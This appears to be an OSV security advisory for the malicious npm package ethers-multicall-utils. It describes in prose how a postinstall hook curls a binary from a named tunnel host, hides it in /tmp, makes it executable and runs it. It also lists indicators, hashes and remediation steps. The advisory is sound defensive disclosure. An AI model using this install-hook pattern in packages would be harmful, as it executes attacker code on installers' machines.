MAL-2026-4240

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-multicall-utils/MAL-2026-4240.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4240

Aliases

GHSA-r83q-qx5h-cjqm

Published

2026-05-20T00:00:48Z

Modified

2026-05-26T06:02:18.099466738Z

Summary

Malicious code in ethers-multicall-utils (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fe5e969b4ca41dbbd6ef1c04c12d48906ea4477b39493e766045effd4939d748)

On npm install, the package's postinstall script spawns node -e to run an inline child_process.execSync that curls a binary from rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry, saves it to the hidden path /tmp/.node-cache, chmod +x's it, and executes it in the background, swallowing errors via try/catch. The destination is an anonymous, ephemeral Pinggy free-tunnel host with no relation to the ethers / multicall ecosystem; the URL is unversioned, lacks an explicit scheme, and the fetched binary is opaque with no hash or signature verification. The package's advertised purpose (batching ethers RPC calls) does not require any binary download or telemetry executable. The package metadata reinforces malicious intent: the name ethers-multicall-utils mimics the legitimate ethers-multicall / @0xsequence/multicall libraries, the author is a placeholder (Web3 Developer Tools <dev@ethers-tools.dev>), and the declared repository github.com/ethers/ethers-multicall-utils does not exist. Installing this package executes attacker-controlled bytes on the installer's machine.

Source: ghsa-malware (c53a0db99f667c745b204d69826c00088b437fd873a9cdf32e417334d801755c)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific

{
    "malicious-packages-origins": [
        {
            "source": "ghsa-malware",
            "modified_time": "2026-05-22T02:43:00Z",
            "sha256": "c53a0db99f667c745b204d69826c00088b437fd873a9cdf32e417334d801755c",
            "id": "GHSA-r83q-qx5h-cjqm",
            "ranges": [
                {
                    "type": "SEMVER",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ],
            "import_time": "2026-05-22T03:24:54.644961844Z"
        },
        {
            "versions": [
                "1.3.15"
            ],
            "modified_time": "2026-05-20T00:00:48Z",
            "sha256": "321a360a9a275e7ed673033dcf3592d65de1832436ed55beee42971aa8e973bd",
            "id": "IN-MAL-2026-003309",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:23.898021147Z"
        },
        {
            "versions": [
                "1.3.15"
            ],
            "modified_time": "2026-05-20T00:00:48Z",
            "sha256": "fe5e969b4ca41dbbd6ef1c04c12d48906ea4477b39493e766045effd4939d748",
            "id": "IN-MAL-2026-003308",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:23.801461702Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / ethers-multicall-utils

Package

Name: ethers-multicall-utils; View open source insights on deps.dev
Purl: pkg:npm/ethers-multicall-utils

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Affected versions

1.*

1.3.15

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-multicall-utils/MAL-2026-4240.json"

indicators

{
    "domains": [
        "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link"
    ],
    "package_integrity": [
        {
            "filename": "ethers-multicall-utils-1.3.15.tgz",
            "hashes": {
                "sha512_sri": "sha512-eWCqlKh+3Z43BqQNdL2XQeHiJTzaUk+D68PvLo7qICFQmZ6O0HYdY2/JBY0Dqy0ia0ElXyS5M8xh9HKUo9stmA==",
                "sha1": "432ef3341854be36dc219a13f191c249ca11f730"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "1c011090d4284f7348cc0fa6185c71c0b0628c038a80b848f347816ec38f76e86fd99e",
            "sha256": "4c155819c9c8583183416f927c6a749a16b62a25f1a0cbbbf78792987a2a7cbe"
        }
    ]
}